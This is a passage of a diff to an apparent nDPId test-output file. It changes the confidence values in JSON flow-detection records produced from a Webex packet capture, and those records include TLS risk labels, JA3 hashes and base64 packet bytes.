00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1444570640399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640399,"pkt":"ABoRAAACABoRAAABCABFAAA82ZRAAEAGODkKCAABPm3geMe\/Abvolh2LAAAAAKACOQhRpAAAAgQFtAQCCAoATMR9AAAAAAEDAwY="} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640407,"pkt":"ABoRAAACABoRAAABCABFAAAoO9lAAEAGNmAKCAABUEpuRILnAbv7u\/+EBEQAfVAQOQgpkQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640408,"pkt":"ABoRAAACABoRAAABCABFAAAosmNAAEAGv9UKCAABUEpuRILoAbtZhnZApnmJwVAQOQgpkAAA"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669736,"flow_last_seen":1444570669736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669736,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1444570669736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669736,"pkt":"ABoRAAACABoRAAABCABFAAA80OhAAEAGQOUKCAABPm3geMfSAbvlsh8HAAAAAKACOQhHhwAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1444570669745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAAoAiJAABAGP8A+beB4CggAAQG7x9IaTeD45bIfCFAS\/\/+9VQAA"} @@ -202,50 +202,50 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1444570669745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAA8QwJAAEAGzssKCAABPm3geMfTAbvSW4ztAAAAAKACOQjs9gAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAoAiNAABAGP78+beB4CggAAQG7x9MtpHMS0luM7lAS\/\/+9VAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAo0OlAAEAGQPgKCAABPm3geMfSAbvlsh8IGk3g+VAQOQiETgAA"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 